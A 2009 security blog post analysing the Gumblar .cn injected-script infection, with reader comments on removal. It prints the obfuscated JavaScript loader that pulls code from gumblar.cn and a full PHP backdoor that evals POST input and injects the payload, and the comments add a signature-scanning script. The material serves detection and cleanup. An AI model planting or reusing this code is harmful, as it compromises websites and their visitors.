
Gumblar .cn Exploit – 12 Facts About This Injected Script

   07 May 09   Filed in Website exploits

I’ve been watching this exploit for about a week now.  During the last couple of days it became the prevailing problem detected by Unmask Parasites.

I don’t have reliable information about how the infection occurs. However I have compiled a list of facts that might be useful if you are fighting this exploit.

1 Infected web pages contain a script that looks like this:

(function(jil){var xR5p='%';e val(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);

2 Every infected site has its own modification of the script. However, every modification has common parts and can be easily identified as the gumblar .cn script.

  1. The script starts with “(function(
  2. The function has no name.  It is anonymous and self-invoking.
  3. The script is obfuscated, i.e. some characters are replaced with their numeric codes, and then the “%” character is replaced with some arbitrary character. Here are some sample excerpts of the encoded data: “…20a.3d.22Sc.72iptEngin.65…“, “…~76ar~20a~3d~22Scr~69~70~74En~67~69ne…“, “…v_61_72_20_61_3d_22_53_63rip_74E_6e…
  4. Near the end of the script there is a “.replace(” function
  5. If the function accepts parameters, at the very end you’ll find a simple regular expression like /”/g or /~/g, etc. that restores the mangled “%” character.

3 When the script is executed (every time someone visits the infected web page),  another script from “gumblar . cn/rss/” is silently loaded and executed.

4 This code is usually injected right before the <body> tag.  I saw a web page with eight(!) <body> tags (yeah, invalid HTML) and the gumblar scripts were injected before each of them.

5 Sometimes I encounter this script on sites infected with the malicious iframes that I reviewed in my recent posts. So this exploit may use the same infection technique, and probably the same clean-up steps may be applied.

6 Unlike the recent iframe exploits, where the malicious code was only injected into files with most common filenames (e.g. index.html, index.php, etc.) this gumblar script is injected into every web page.

7 This script is also injected into .js (JavaScript) files. Usually at the very bottom.

8 Maybe it’s just a coincidence, but about 95% of the infected sites used PHP. It is not possible to say for sure whether the remaining sites used PHP. Who knows.

9 This exploit doesn’t rely on any particular script vulnerability. I encountered it on phpBB, SMF and vBulletin forums, on WordPress 2.7.1 blogs, and on proprietary PHP sites.

10 Some people reported that the following code is injected into PHP files:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))
define('TMP_XHGFJOKL',base64 _decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBFb0xTPSd2YXI8MjBhPDNkPDIyUzw2M3I8NjlwdDw0NW5naTw2ZWU8MjI8MmNiPDNkPDIyVmVyczw2OW88NmUoKSs8MjI8MmNqPDNkPDIyPDIyPDJjPDc1PDNkPDZlYXZpZ2F0b3I8MmV1czw2NTw3MkFnZW50PDNiaWYoKHU8MmVpPDZlPDY0ZXhPZig8MjJXaW48MjIpPDNlMCk8MjY8MjYodTwyZWluZGV4Tzw2NjwyODwyMjw0ZVQ8MjA2PDIyKTwzYzApPDI2PDI2KDw2NG9jdW1lPDZldDwyZWNvbzw2YmllPDJlaTw2ZWRleDw0ZmYoPDIyPDZkaTw2NTw2YjwzZDE8MjIpPDNjMCk8MjY8MjYodDw3OXA8NjVvZih6cjw3Nno8NzRzKTwyMTwzZHR5cGU8NmZmKDwyMjw0MTwyMikpPDI5PDdiPDdhcnZ6dHM8M2Q8MjJBPDIyPDNiZTw3NmFsKDwyMmlmKHc8NjluZG93PDJlPDIyK2ErPDIyKTw2YTwzZDw2YSs8MjI8MmJhKzwyMjw0ZGFqb3I8MjI8MmI8NjI8MmI8NjErPDIyTWlub3I8MjIrYis8NjErPDIyPDQydTw2OWxkPDIyPDJiYjwyYjwyMmo8M2I8MjIpPDNiZG9jPDc1bWVudDwyZXdyaTw3NGU8Mjg8MjI8M2NzPDYzcjw2OXB0PDIwczw3MmM8M2Q8MmY8MmZndTw2ZDw2Mmw8NjFyPDJlY248MmZyczw3MzwyZjwzZmlkPDNkPDIyK2orPDIyPDNlPDNjPDVjPDJmPDczY3JpcHQ8M2U8MjIpPDNiPDdkJzt2YXIgQ2l6PUVvTFMucmVwbGFjZSgvPC9nLCclJyk7ZXZhbCh1bmVzY2FwZShDaXopKX0pKCk7CiAtLT48L3NjcmlwdD4='));
function tmp_lkojfghx($s){ if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
foreach($a[0] as $v) if(count(explode("\n",$v))>5){
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v) || preg_match('#[\(\[](\s*\d+,)20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos;($v,'[removed]')))$s=str_replace($v,'',$s);}
$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
if(stristr($s,'<body')) $s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')
$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
?>

The base64-encoded part is this gumblar .cn script.

This PHP code, its structure and variable names (tmp_lkojfghx, tmp_lkojfghx3, TMP_XHGFJOKL) are the same as in the infamous fake Yahoo counter exploit. Only the injected JavaScript is different. Maybe it was created by the same people, or maybe just the same exploitation kit was used.

11 This is not a server-wide exploit. I checked several servers with infected sites. Most of the neighbor sites were clean.

12 Gumblar .cn domain is currently blacklisted by Google.

Removal

Most likely this exploit is caused by compromised FTP credentials. So start with your own computer. Scan it for spyware. Some people reported good results with Malwarebytes.

Then (from a clean computer) change FTP passwords.

Try not to store them inside programs that you use to upload files to a server.

Whenever possible use secure connections. I.e. use SFTP instead of plain FTP. Many shared hosting plans include SFTP.

Finally, remove the malicious code from all server files (.html, .php, .js, etc.). The easiest way to do it is to replace them with clean files from a backup.

If you have more facts about this exploit, please post them in the comment section below.

May 10, 2009. Update…

Round Up of the Comments

The comments section of this blog post contains a lot of additional useful facts from webmasters of infected sites.  Be sure to read them.

Zork noticed that his site’s .htaccess file was modified

Jason talks about what this exploit does from a visitor’s point of view. Of course, a visitor can be a webmaster of another site.

adel sarlak mentioned that this exploit also adds image.php files into image directories. It can also change directory permissions.

James also elaborates on the scripts in image.php and some other .php files. He suggests a shell command to find infected files.

C Filorux shared information about a POST-and-eval backdoor script found on an infected site.

rad-one posted a PHP script that scans all files from your site looking for the exploit signatures.
It looks incomplete and you might need to finish it before using it.

Another set of removal instructions from Neil Williams.

Great comment from web host LarryL, who deliberately infected a PC to find out how this virus works. With this information, he suggests a strategy for preventing re-infection.

Thanks for sharing this info. If anyone wants to publish an article about how they fought the infection or the impact of the infection, please contact me – I can publish it here as a guest post. I’m also looking for “hardening a website” tips and tricks.

P.S. I suggest that you use Unmask Parasites to check if your site is infected. It’s safe and fast.


Reader's Comments (194)

  1. |

    Hello,

    Thanks for your explanation about this, it has already infected 3 of my websites, I use phpfusion cms, 68classifieds and cubecart, I must say they people over at 68classifieds are really spot on with their help, just like your blog here,

    I have run a full virus scan and malware scan on my pc but only picked up cookies, I will change my ftp and will post back my results.

    Thank you so much for your help with this exploit.

  2. |

    One of our web hosting customers is having a problem with gumblar.cn on several of her websites. She noticed that all of the her websites containing this infection had a web counter, and we both suspect that the counter script was used as a back door to gain access to the other files on the website. She’s going to remove the counter scripts and see if these attacks stop.

    • |

      As I mentioned in #9, this is not some particular script vulnerability. I saw many infected sites that didn’t have any web counters at all.

  3. |

    Hi.
    I confirm Your point 10. – i had this php code injected.
    This exploit also creates/edits .htaccess files – sets

    “Options -MultiViews
    ErrorDocument 404 /158612.php

    and (random_number).php contains some strange PHP code.

    What surprised me – when I entered a site infected by this sh#t, Kaspersky didn’t notice ANYTHING.

    • |

      Thanks for sharing this info.

      Did you have that 158612.php file on a server?

      Could you send it to me?

      I just checked 404-error pages on some (not mine) infected sites and they were regular “Not found” pages. Nothing suspicious.

  4. |

    oh, i forgot to mention something – i suppose that it could also have some connection with CHMOD set to 777…
    For security purpose I’ve changed FTP passwords.

  5. |

    When you inadvertently load an infected page, it redirects you to the gumblar webpage, and it pushes a pdf file to your computer. If you’re running an earlier version of Adobe Reader (such as 7 or unpatched 8), it exploits a known Adobe Reader vulnerability, and gets access to your PC. From there, it looks for common ftp clients, (for me this was FileZilla) grabs any stored passwords, and sends them home. While it’s there, it seems to disable regedit, cmd, and can disable virus scanners. The passwords that were sent home are then used to infect your websites, and the cycle continues the next time another webmaster browses across your site.
    So clean up your own PC as suggested, upgrade Adobe Reader, and hopefully you kept backups of your websites!
    Cheers,
    Jason.

    • |

      Correction to my own post… it affects ALL current versions of Adobe Reader. Adobe claim there aren’t any known exploits of this (well there are now!), and haven’t fixed it yet. Workaround is to disable Acrobat Javascript through Edit Properties in Acrobat Reader itself. There is a checkbox in there to turn it off, which stops the malicious PDF from doing any harm on your PC, which stops it getting your FTP passwords, which stops it hacking your websites.
      Also forgot to mention changing your FTP passwords immediately using a clean machine.
      Cheers,
      Jason.

  6. |

    Decrypted, the shellcode above (the script you’ve provided) says this (runs js eval() command on this):
    var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("

    There is nothing after that. It ends with document.write(“. Likely not complete script/possibly where other script takes into effect. It looks like its just taking information about a users computer based on the user agent.

    • |

      >There is nothing after that

      You’ve probably tried to output the result to a web browser window. The next character is “<” and unless you escape it, a browser will omit the rest text.

      • |

        The rest of the data after “write(” is:
        write(“”);}’).replace(jil,xR5p)))})(/%/g);

        • |

          Hehe…I’ll try this again with some substitution…
          write(“LESS_THAN_SIGNscript srcEQUALS//gumblar.cn/rss/?id=”+j+”GREATER_THAN_SIGNLESS_THAN_SIGN\/scriptGREATER_THAN_SIGN”);}’).replace(jil,xR5p)))})(/%/g);

  7. |

    My website was also infected by gumblar.cn

    I ran a scan, reformatted my computer, changed passwords, uploaded clean code, uploaded clean database – website was clean for 1 day and then was hacked again.

    The second time we were hacked, it was referring to hotican . cn – a new site, same problem, same people I am sure.

    I use godaddy – have met a bunch of other people with the same issue, they were also using godaddy. Does this have any truth?

    Godaddy says that the ftp username / password are compromised – I assume it is possible to get this info from a scripting vulnerability, as no one could have access to this info.

    • |

      The original exploit could have left backdoor scripts and/or changed file/directory permissions.

    • |

      I use godaddy too. Told them about this on May , 7, 8, 9th, May 10, May 11 and May 12. Finally got someone to listen when I told them…..I’m not the only one on godaddy with this issue. My problem started May 6th. I believe the virus started April 22nd. I’ve sent them screen shots and everything…

      • |

        i am also using godaddy and i am also getting the same problem. first of all i got this problem on 25th april and after that i cleaned my site, but again on the 15th i got the same error again

  8. |

    Hi !

    I had the same problem with our Website.
    I am almost sure, infection does not happen on the server but on the client which does the upload.

    But up to now i do not know which program does insert the scripts.

    In our case only HTML files were infected.

    But I use some php scripts which read from a file and allow some input. This code has been the entry point for an injection.

    Sophos Antivirus now detects the malicious script as

    Troj/JSRedir-R

    Michael

  9. |

    I found this virus 10 days ago and 4th of my customers got it .

    We removed it more than 10 times but the next day amazingly it was on all pages again .

    I found the source file .

    In each “Images” folder in your site it will copy a php file “image.php”.

    Before removing the script from pages , you must rewrite a same file instead of image.php and change the permissions .

    Then remove the scripts .

    If your site gets the iframe version as fast as you can , you must remove the iframe then replace the image.php .

    Because google may consider your site as a harmful site .

    Another thing is that, in cms sites it changes the permissions of template folders !!!

  10. |

    We got this malware uploaded via FTP credentials. A PHP page on the same site was infected with a POST-and-eval backdoor, also by bad FTP credentials.

  11. |

    I checked on google – my infected site has some “strange” files since… 1st april!

    query google: site:prettyone.pl

    it has to be connected with these .htaccess – I hope now the site is clean (chmod 755, changed passwords etc.)

  12. |

    Enough files that I have found infected by this. I am unable to find the code you mentioned in my PHP files. But let me tell I use fact no. 10 given in your blog. And I am also able to remove iframe for bigtruckstopseek .cn/ts/in.cgi?banner2. Your blog is very helpful.

  13. |

    My site is infected with this virus. In your opinion, what is the proper solution to avoid this huge problem? It has infected most sites and we see no solution other than being blocked by Google and others. So what is the solution?

  14. |

    I can confirm it has attacked a 1.3.7 version zencart

  15. |

    This is a bit off-topic, but considering Twitter has serious vulnerabilities like this one news.cnet.com/8301-1009_3-10222373-83.html?part=rss
    which may be just the tip of the iceberg, I find it rather ironic that unmaskparasites should be patronizing Twitter (as it is, there are many people who are either bored with or hating this service, and practically a very small fragment of this site’s users actually use it).
    For example, will unmaskparasites ask us to visit gumblar.cn to get updates of unmaskparasites? NO! Then why Twitter?
    Let us get rid of this brand slavery too.
    I think a brilliant site like this can stand on its own.

    • |

      I use twitter for what it was designed – for microblogging. Sometimes I want to share information that is not enough to make a real blog post. So I use Twitter.

      On twitter, I announce new blog posts, minor Unmask Parasites updates, sometimes other news that I think are worth sharing.

      If you don’t trust links I post (especially shortened ones: tinyurl, snurl, etc.), you can always check them with Unmask Parasites. This way you will see where they actually link to and whether those pages have security issues.

      You can follow me @unmaskparasites

  16. |

    I am unable to remove following script which appended after the body tag. I remove it but it got added when I refresh page to check :(

    And if I see file, this code is not presented. Seems added on runtime. Please suggest solution for it.

    Thanks,

    Edit by Denis: I’ve removed your site from your signature since it’s still infected
    http://www.UnmaskParasites.com/security-report/?page=www.pakzilla.com

    • |

      Tahir,

      Did you clean your computer and change site passwords?

      Did you also check file and directory permissions? There are reports that they are changed to 777 and 666 so anyone can create/modify arbitrary files.
      Check all wordpress .php files for suspicious code.

      • |

        How I am doing to remove this threat is:

        - remove malicious code from image.php file from all images folder
        - look for iframe code added on the top or bottom of php page – remove it
        - hunt out all php, js and html files for added anonymous javascript methods.
        - put dir permission to 755
        - especially look for wp-include/all js files. I found all files infected with injected js anonymous methods.

        still going….

        • |

          Please check your .htaccess files. There is a comment saying they add some rules there.

          I’d suggest that you remove all files and directories and then reinstall WordPress from scratch. This way you can be sure you haven’t missed any backdoor scripts. It will be like an upgrade from v2.7.1 to v2.7.1. Just leave your wp-config.php file and wp-content directory (you’ll need to check them manually) to preserve your blog content.

          And don’t forget to change passwords every time you remove the malicious code.

          • |

            Thank you! Thank you! very much Denis.

            I just run your scan http://www.UnmaskParasites.com/security-report/?page=pakzilla.com and it has given me green signal.

            What I did is manual removal of code from my Plesk control panel and I change my ftp password but didnt use it.

            I also run scan with AVG Anti-Virus and Malwarebytes Anti-Malware.

            Your support has made my day. I will try to follow all security guidelines to prevent it.

            Thumbs up!

  17. |

    Posting here a PHP script that scans all files from your site looking for the exploit signatures. Useful to see the files affected. Some false positive results may be returned for the “(function(){” string search.

    Place file on site root folder. And use $excludes_array to exclude false positive files.

    ');

    $dirs_array = array();

    if ($handle = opendir($dir)) {

    echo "Open dir: " . $dir . "";
    echo "Files:";

    // this is the correct way to loop over the directory.
    while (false !== ($file = readdir($handle))) {
    if ($file != '.' && $file != '..') {

    $path = $dir . $file;

    if (is_file($path)) {

    // skip large files
    if (filesize($path) > 1000000) {
    continue;
    }

    // exclude files
    if (in_array($path, $exclude_files)) {
    continue;
    }

    // get content
    $file_handle = fopen($path, "r");
    $contents = '';
    while (!feof($file_handle)) {
    $contents = fgets($file_handle);

    // loop for search string
    $found = false;
    foreach ($search as $search_string) {
    if (stristr($contents, $search_string)) {
    $found = true;
    break;
    }
    }

    if ($found == true) {
    echo '' . $path . ' … ';
    echo '[FOUND ' . $search_string . ']';
    echo "";

    break; // break while
    } else {
    //echo '[CLEAN]';
    }

    }

    fclose($file_handle);

    } elseif (is_dir($path)) {

    $dirs_array[] = $path;

    }
    }
    }
    closedir($handle);
    }

    foreach ($dirs_array as $dir) {
    scan_files($dir . '/');
    }

    unset($dirs_array);
    }

    $start_dir = $_SERVER['DOCUMENT_ROOT'] . '/';

    echo 'Starting from: ' . $start_dir . '';

    scan_files($start_dir);

    ?>

  18. |

    Missing file header

    ');

    $dirs_array = array();

  19. |

    set_time_limit(0);

    $exclude_files = array(
    $_SERVER['DOCUMENT_ROOT'] . '/' . 'file_checker.php',
    );

    function scan_files($dir) {

    global $exclude_files;

    // malware strings to search
    $search = array(
    '.cn/', 'gumblar', 'eval(unescape', 'eval(base64_decode', 'eval(decode', 'eval(base', 'base64_decode', '(function(){', 'eval(String.fromCharCode',
    'neglite.com', 'niklejo.net', 'internetcountercheck.com',);

    $dirs_array = array();

  20. |

    One other thing that I don’t see here is that the script adds image.php scripts to many of your image directories. It appears to target specifically directories called “images,” at least on my server. I’m guessing it probably searches for “image” as well.

    Also, it seems to target .php or .inc with the strings “database,” “settings,” or “config” in them.

    This has been particularly annoying to clean out and it’s been hitting my server the last week or so.

    My server has Drupal and Phplist installed, along with some other scripts I wrote, and most of them were infected, so I’m beginning to wonder if this isn’t a bug with php itself and not necessarily a specific application.

    • |

      Also, just to be safe, make sure you’re not deleting legitimate image.php files from your server since some scripts occasionally use them.

      I’ve found the easiest way to find what was infected was to log into a shell and run find. I noticed that the modified times of the files all fall reasonably close to each other, so you can run something like this:

      find . -mmin -60 > virus.log

      which will tell you what has changed in the last 60 minutes in all your directories.

      Having said that, I still haven’t been able to identify where the culprit is coming from, even looking at my access logs.

  21. |

    This is how i`m removing at the moment

    Removing Gumblar.cn

    If you have a backup of your website upload over the old website, if not login with Dreamweaver etc and find and remove following,

    • Any image folder containing image.php remove, only image folders nothing else
    • Download(get) entire site and first do a search on entire site for unescape this malicious code is normally placed in the beginning of php and end of javascript pages, remove all instances
    • Search again for iFrame src and any weird links remove, be careful just to remove the iframe links
    • Download and install malware malbytes from here http://www.malwarebytes.org , update the software and run in safemode (press f8 on startup) and remove all malware
    • Download and run avast or avg and execute a full virus scan and remove any viruses from your computer
    • Update Adobe acrobat reader to version 9.1, download and install here http://get.adobe.com/uk/reader/ , malicious code has been known to use old versions of adobe
    • Next login to your hosting account and change ftp password for your website, use symbols if possible
    • Change ftp password in Dreamweaver etc
    • Download Google Chrome to test your site, if it still has Gumblar.cn the browser will tell you. Get it here http://www.google.com/chrome

    Always keep your computer updated with malware and antivirus software, use zonealarm as a firewall and only use one computer to ftp.

    • |

      I’d suggest that you remove passwords from Dreamweaver instead of just changing them.

      To test your site you can use my Unmask Parasites online service. It’s safer than using Google Chrome (there may be malicious scripts that load code from sites that Google hasn’t identified as malicious yet).

      I also suggest using FireFox 3 with the NoScript plugin (Never use the “allow all this page” option. If you need scripts, allow trusted domains one by one. This way your browser will never load external scripts and iframes with trojans).

      • |

        Thanks Denis for your excellent advice about this issue,I have also noticed that when I look at an infected site with ff or IE the virus is downloaded and automatically starts Adobe updater, Zone alarm blocked this just after entering a known hacked site.

        This is what it blocked.
        Product name Adobe Updater
        File name C:\Program Files\Common Files\Adobe\Updater6\Adobe_Updater.exe
        Last policy update Not applicable
        Version 6, 2,0, 1474
        Last modified date 08/01/2009 07:36:42
        File size 2462 KB

        I hope this helps, and any advice about this would be greatly appreciated. I have updated my adobe reader to version 9.1, do I delete this file ?? Does Adobe know about this ?

  22. |

    Hello,

    I found my server infected with the same malware,

    i found all default.html , index.html /htm
    and index.php , db.php and similar php , like includefiles.php infected with the same.

    removed everything manually.

  23. |

    I am non-techie but I believe I got hit. I noticed this morning that the browsers (Google/Mozilla and Explorer) on my Home PC were extremely slow to endless when moving from one page to another. I shut down my PC several times, until suddenly I noticed a “waiting for gumblar.cn” appearing in the left bottom. I was suspicious, Googled it and found your blog.
    I remember that this morning an Adobe upgrade popped up (I forget which) so I clicked it. Then it prompted me to also download free Norton spyware, which I declined because I have the Norton suite installed. I am thinking now that the Adobe download could have been the fake that got gumblar.cn onto my PC. Any suggestions on how to remove it? Shall I delete all Adobe versions on my PC? Since I am non-techie, shall I call a techie to come to my house?

  24. |

    I had the same problems with gumblar and tried a bunch of different things, but the only thing that worked is what Jason wrote. It uses Adobe/Acrobat reader…If you disable javascript in adobe you should be ok. Also, erase all private data after each session in your ftp program.

  25. |

    Hi, I got this problem on some of my websites. The whole thing, even the iFrames. I was able to remove all of the bad code except the

    “(function(jil){var xR5p=’%';ev…”

    script on two of my sites. Both sites are WordPress 2.7.1

    I can’t find the file or files where this code was inserted. I replaced every file with a clean backup but it’s still there. Any help would be appreciated.

    I was able to clean a myBB installation, by uploading a clean backup. With WP, this is not working.

    I removed Adobe Reader, changed FTP-Passwords,
    ran several anti-virus tools. Hope my system is clean now.

    It seems to me that we’re dealing with a group of exploits which all behave a little bit differently on each webserver. (i.e. three WP installs, one able to clean, the other two: WTF?!)

  26. |

    hello,

    first, my vbulletin was “hacked” with this… than it was also on my joomla core and I had to edit all files^^ very time wasting work…

  27. |

    here is my script which i changed a little:

    it works perfectly:

    <?php
    set_time_limit(0);

    // files known to be clean (false positives); add your own here
    $exclude_files = array(
        $_SERVER['DOCUMENT_ROOT'] . '/' . 'file_checker.php',
    );

    function scan_files($dir) {

        global $exclude_files;

        // malware strings to search
        $search = array(
            '.cn/',
            'gumblar',
            'eval(unescape',
            'eval(base64_decode',
            'eval(decode',
            'eval(base',
            'base64_decode',
            '(function(){',
            'eval(String.fromCharCode',
            'neglite.com',
            'niklejo.net',
            'internetcountercheck.com'
        );

        $dirs_array = array();

        if ($handle = opendir($dir)) {

            echo "Open dir: " . $dir . "";
            echo "Files:";
            echo "";

            // this is the correct way to loop over the directory.
            while (false !== ($file = readdir($handle))) {
                if ($file != '.' && $file != '..') {

                    $path = $dir . $file;

                    if (is_file($path)) {

                        // skip large files
                        if (filesize($path) > 1000000) {
                            continue;
                        }

                        // exclude files
                        if (in_array($path, $exclude_files)) {
                            continue;
                        }

                        // read the file line by line
                        $file_handle = fopen($path, 'r');
                        $contents = '';
                        while (!feof($file_handle)) {
                            $contents = fgets($file_handle);

                            // loop for search string
                            $found = false;
                            foreach ($search as $search_string) {
                                if (stristr($contents, $search_string)) {
                                    $found = true;
                                    break;
                                }
                            }

                            if ($found == true) {
                                // $search_string still holds the matching signature
                                echo '' . $path . ' … ';
                                echo '[FOUND ' . $search_string . ']';
                                echo "";
                                break; // break while
                            } else {
                                //echo '[CLEAN]';
                            }
                        }

                        fclose($file_handle);

                    } elseif (is_dir($path)) {

                        $dirs_array[] = $path;

                    }
                }
            }
            closedir($handle);
        }

        // recurse into subdirectories
        foreach ($dirs_array as $dir) {
            scan_files($dir . '/');
        }

        unset($dirs_array);
    }

    $start_dir = $_SERVER['DOCUMENT_ROOT'] . '/';

    echo 'Starting from: ' . $start_dir . '';

    scan_files($start_dir);

    ?>

    • |

      Hi,
      Mike I put your code to php file and put it to my web’s root on sever.
      And when i open it in my browser I got error:

      Parse error: syntax error, unexpected T_FUNCTION, expecting ‘)’ in /var/www/…../file_checker2.php on line 21

      or I do smth. wrong?

      Thank U!

      Edit by Denis: I removed your site from your signature since it still contains malicious iframes.

      • |

        Oleksandr,

        There seem to be several bugs in the script (probably introduced by my WordPress commenting system that replaces two single quotes with one double quote character.)

        I was able to run this script when I replaced all single quotes (‘) with double quotes (“) and added missing quotes in lines like this:
        $contents = ”;

        Note that the script returns many false positives (e.g. base64_decode in legitimate WordPress files and (function(){ in legitimate .js files).

        • |

          Could you post the fixed script please?

          • |

            The script is not very useful. It just lists file where it finds suspicious strings. Too many false positives.

            It’s much easier to remove all files and then restore them from a clean backup.

  28. |

    We had this problem on one of our sites. Don’t know where it came from. Avast! instantly recognized it. ZoneAlarm doesn’t see it.

    To fix it, I deleted the swobject.js file which seemed to be where it was coming from. We also had to delete malicious code from index.php and an html header file. It seems to be okay right now. I will update. I have also changed ftp password. It’s also fixed a weird error I was getting in cpanel. Unsure if it’s related.

    Thanks for the help!

  29. |

    Hey,

    ALL .htm and .html pages on my server have been affected. I haven't checked any script or php files yet :-\
    Will have to manually edit 100+ files :-(

  30. |

    On clicking the RSS link beside the star icon at the top of this page, AVG stops and sets a red alert. Please see the picture:
    http://img26.imageshack.us/img26/2639/rsslinkproblem.jpg

    • |

      Thanks for reporting the problem.

      The "feeds2.feedburner.com" site is Google's feed-burning service used by millions of other blogs. The RSS feed itself is just my blog's content without design elements (raw content).

      I suspect that AVG detected samples of malicious code (non-executable) that I post in my articles and decided it was active.

      I couldn’t find anything suspicious in my RSS feed.

      I’ll need to investigate this issue though. Thanks

      • |

        Thanks. The problem is that it won't simply allow me to subscribe.

        Regarding the microblogging, thanks for your explanation. I find it much easier to follow one site (for example this site) rather than to follow dozens of sites like Twitter etc.

        I believe that many users feel the same way: there is simply no need to visit potentially problematic sites (I may not be warned; better to be proactive) when short notices on this site or via subscriptions suffice.

        Of course it's your choice :)

  31. |

    I’m a web host. Two of our customers have been hit by this so far. The gumblar code is propagated by infected websites. It will embed itself on your computer, search for usernames/passwords, and send them to the gumblar.cn site. They use this information to place the javascript code into all of the html files on your website. I verified this by purposely infecting a PC with bad credentials stored in Filezilla, then watching the login failures as they attempted to use them. The infected PC constantly attempts to connect to gumblar.cn – you can verify this with netstat from the command line.

    In my testing Avaya and Chrome both detect the gumblar code in html files – AVG and Kaspersky have not (as of now). I fixed the infected system with the ComboFix program that is used on the Tech Guy forum.

    Fixing the html files on a website is a tiresome manual process which could be automated pretty easily with a little bit of work.

    The keys to preventing re-infection are to get the thing off your local PC, to get the javascript out of the html files on your site, and to rename images/images.php to something else and replace it with another images.php with such permissions that it can’t be modified or overwritten.

    • |

      “you can verify this with netstat from the command line.”

      How? Is it possible to detail the exact steps please?

      • |

        Assuming Windows:

        Start/Run
        Type cmd and press Enter
        In the command box type netstat and press enter

    • |

      How did you infect a pc and how can I tell if a pc has actually been infected without checking netstat? I have the problem with only one of my clients so I guess it is not my pc that has been infected.

  32. |

    My website has also been infected with the same virus. I followed the instructions to clean up 100+ files last night. When I checked my website using Unmask Parasites, it says that my website is clean. The detailed report is linked to:

    http://www.google.com/safebrowsing/diagnostic?site=www.itxdepot.com

    When I use Google Chrome to open my webpage, I still get the warning message. When I open my webpage and view the sourcecode, the code still shows the infected script.

    I checked the server site and all of the files which I cleaned up did not come back with any infected script.

    This situation sounds similar to Tahir’s but I still can’t solve this problem.

    Can anyone help me with this problem?

    • |

      The reason why Unmask Parasites doesn't say your site is infected is that you only checked the home page, which is clean. However, it redirects to "/xcart/index.php", and that page is infected, which Google Chrome detects.

      If you explicitly check that page, Unmask Parasites detects the suspicious script as well:
      http://www.UnmaskParasites.com/security-report/?page=www.itxdepot.com/xcart/index.php

      • |

        Thanks for the reply Denis. Yes, I did check the files before I posted for help. None of the files were infected with the code again on the server side (after I cleaned up last night).

        But for some reason it adds code back to the pages and displays it on the client side only. I did every step the same as Tahir's posting. I don't know what I'm missing :(

        • |

          We just found out that we missed one PHP file that we did not clean up last night. Now, everything is on the right track. Thank you very much for your site. Without all of the tips from your site, I don’t know how long it would have taken me to fix the problems.

    • |

      Got hit with this one myself on a client's machine... Gotta clear the tmp stored versions of the index, home, main, etc. in the CNF or CTF (something like that) folder on the server side; that's where the cached versions are located that the browsers pull... or so I think anyway. Good luck staying out of gumblar's path, he's a son of a gun.

  33. |

    [...] Kristi wrote a guest blog post at TechJaws about the attack last weekend on her well known Kikolani Blog on the Art of Blogging by the PHP Script Injection Exploit in WordPress 2.7.1.  Kristi explains how she restored her blog and dealt with the issue. The UnMask Parasites blog provides additional details on what is known about this particular malware which has been dubbed the Gumblar .cn Exploit. [...]

  34. |

    We have had this virus now for 1 month. We believe it came through one of our wordpress sites. They saw that we stored all of our passwords and logins on dreamweaver for our 50+ sites.

    All sites are infected with this virus, we remove daily. Google bans these sites and you lose traffic and ultimately business.

    We have to pay a full-time web developer to keep looking for them and remove them manually every day.

    We are almost ready to move all sites to a new dedicated server.

    Solutions I have heard:

    Change FTP. We have done.
    Format computer. We have done.
    Remove all viruses. We have done.
    Restore site from a backup from 1 month before the virus infection. We have done.

    Nothing left to do. This is killing us.

    • |

      And you still store passwords in dreamweaver?…

      • |

        No, we stopped storing passwords but it is using up our staff resources deleting this virus every 24 hours.

    • |

      Have you had a look in the images directory? If there is a file there called image.php, rename it to bak.image.php. Create a new, empty image.php file and change its permissions so that it can not be edited.

    • |

